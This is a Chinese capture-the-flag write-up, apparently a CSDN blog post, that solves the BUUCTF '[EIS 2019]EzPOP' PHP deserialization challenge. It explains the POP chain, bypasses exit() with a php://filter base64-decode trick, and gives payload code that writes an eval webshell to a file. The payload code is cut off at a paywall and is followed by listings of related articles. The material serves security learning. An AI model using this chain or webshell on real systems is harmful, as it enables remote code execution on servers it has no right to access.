BUUCTF__[EIS 2019]EzPOP_题解

最新推荐文章于 2025-08-27 13:06:51 发布
原创 最新推荐文章于 2025-08-27 13:06:51 发布 · 1.2k 阅读 · 1
标签
#php #反序列化

前言

  • 好久没写了,懒了

解题

  • 最后有一个反序列化函数unserialize来推一波poc利用链。

  • 从后往前推,首先看到file_put_contents函数,可以写入webshell文件。

  • 再来看看两个参数。其中可以看到data,经过了拼接处理,其中有一个exit好像不太行,但我们可以利用php伪协议绕过,看看这篇详情介绍谈一谈php://filter的妙用

    $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;

  • 往上,虽然有个数据压缩的代码,但是只需要options['data_compress']为假就不进入if不执行,经过了serialize函数,但这个函数并非是序列化函数,而是在class B中自定义的serialize函数。

  • 但是$value变量来自class A中调用set函数时传递的$contents变量。那么class是怎么调用class B中的set函数,首先魔术方法__destruct()在反序列化时被调用,if一个 !$this->autosave,这就要求$this->autosave为假,然后是调用save()函数,其中的$this->store->set();完成调用,这就要求$this->storeclass B的对象。

  • 在往上,$contents变量来自函数getForStorage();的返回值,其中参数为数组[$cleaned, $this->complete],两个选择,第一让$cleaned为shell内容,第二就是$complete,显然$complete更简单,所以让$complete为shell内容,那么$cleaned为一个空数组就行了。

  • 再来看看filename,往上找的一个就是函数getCacheKey($name);的返回值,返回的是options['prefix'] . $name;两个变量拼接,其中$name来自class A中调用set函数时传递的$key变量。结束。

  • 然后就再来看看具体的paylaod。

  • 首先调用class Bset函数的条件$this->autosave=false$this->store=new B();

  • 再是shell路径$this->key = "php://filter/write=convert.base64-decode/resource=shell.php";options['prefix']不要也行,反正只是拼接。

  • 然后来看shell内容,首先绕过数据压缩$this->options['data_compress'] = false;

  • 然后是让$cleaned为空数组,它调用了cleanContents($this->cache);因为函数参数是数组类型,所以让$this->cache=array();为一个空数组,防止调用报错。

  • 最后是shell内容,$this->complete = base64_encode("xxx".base64_encode('<?php @eval($_GET["1"]);?>'));$this->options['serialize'] = 'base64_decode';

  • 第一次编码是为了绕过exit,第二次是为了防止出错,但中间拼接的'xxx'的作用是啥?

  • base64算法解码时是4个字节一组,如果直接伪协议base64解码前面拼接内容"<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n"如果不足4的倍数会向后取三位补足4的倍数,破坏我们的shell内容,所以我们加上字符补全,来看看需要补多少个字符。

  • sprintf('%012d', $expire)不用管,输出12个字节刚好。由于<、?、()、;、>、\n都不是base64编码的范围,所以base64解码的时候会自动将其忽略,所以剩下phpexit九个字节,补三个。

  • payload

<?php
class A{
   
   
    protected $store;
    protected $key;
    protected $expire;

    public function __construct()
    {
   
   
        $this->cache = array();
        $this->complete = base64_encode("xxx".base64_encode('<?php @eval($_GET["1"]);?>'));
        $this->key = "php://filter/write=convert.base64-decode/resource=1.php";
        $this->store = new B();
        $this->autosave = false;
    }


}
class B{
   
   
    public $options = array()
最低0.47元/天 解锁文章
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 1612
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
EIS2019-EzPOP
ro4lsc的博客
05-14 1746
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 413
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 511
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
[EIS 2019]EzPOP
shinygod的博客
09-16 504
知识点:file_put_contents用php://filter绕过exit,代码审计
132,【1】 buuctf web [EIS 2019]EzPOP
2402_87039650的博客
02-13 499
不过啊,不过啊,下面几个代码块首先引起了我的关注,截下来更方便看。先不进入靶场了,先看给出的代码。还是很懵,先看看大佬脚本。那要不还是继续看代码吧。
『CTF Web复现』BUUCTF-[EIS 2019]EzPOP
Ho1aAs‘s Blog
10-07 1636
# 利用点 - base64 + filter协议绕过死亡exit
buuctf——web刷题第5页
最新发布
uwvwko的博客
08-27 1705
若让eval()去执行trigger_event(),并且在后面跟着buy和get_flag,那么buy_handler()和get_flag_handler()便先后进入队列,那么这时consume_point_function()就会在get_flag_handler()之后。、>、\n都不是base64编码的范围,所以base64解码的时候会自动将其忽略,所以解码之后就剩php//exit了,9个字节,但是呢base64算法解码时是4个字节一组,所以我们还需要在前面加3个字符。$data = "<?
序列化与反序列化——[EIS 2019]EzPOP
LSYZWF的博客
11-06 492
文章目录题目解答 题目 链接:https://buuoj.cn/challenges#[EIS%202019]EzPOP 解答 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS 2019]EzPOP-PHP代码审计学习
cjdgg的博客
03-09 385
[EIS 2019]EzPOP-PHP代码审计学习 作为一个不太聪明的WEB安全菜鸟,代码审计一直不咋地,正好遇到一道题,记录一下学习过程 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3288
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
EIS 2019——misc3
pigredfive的博客
11-29 475
题目截图: 打开网页,有下载链接,下载下来一个html文件,打开: 解题过程: 一个html文件,可以考虑按F12来看一下源代码里面有没有flag。 找到一堆由Unicode编码格式的 (&zwnj ; )(&#8203 ; ) 这两个字符可以考虑用0,1替换掉,然后二进制转ascii。先考虑 (&zwnj ; )为0,(&#8203 ; )为1 的情况: ...
2019EIS-ezjava--fastjson-1.2.47-RCE
地址ch3nye.top
12-08 1026
转载 https://github.com/CaijiOrz/fastjson-1.2.47-RCE/ fastjson-1.2.47-RCE Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法,以及避开坑点 以下操作均在Ubuntu 18下亲测可用,openjdk需要切换到8,且使用8的javac > java -version openjdk versin "1....
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 10万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值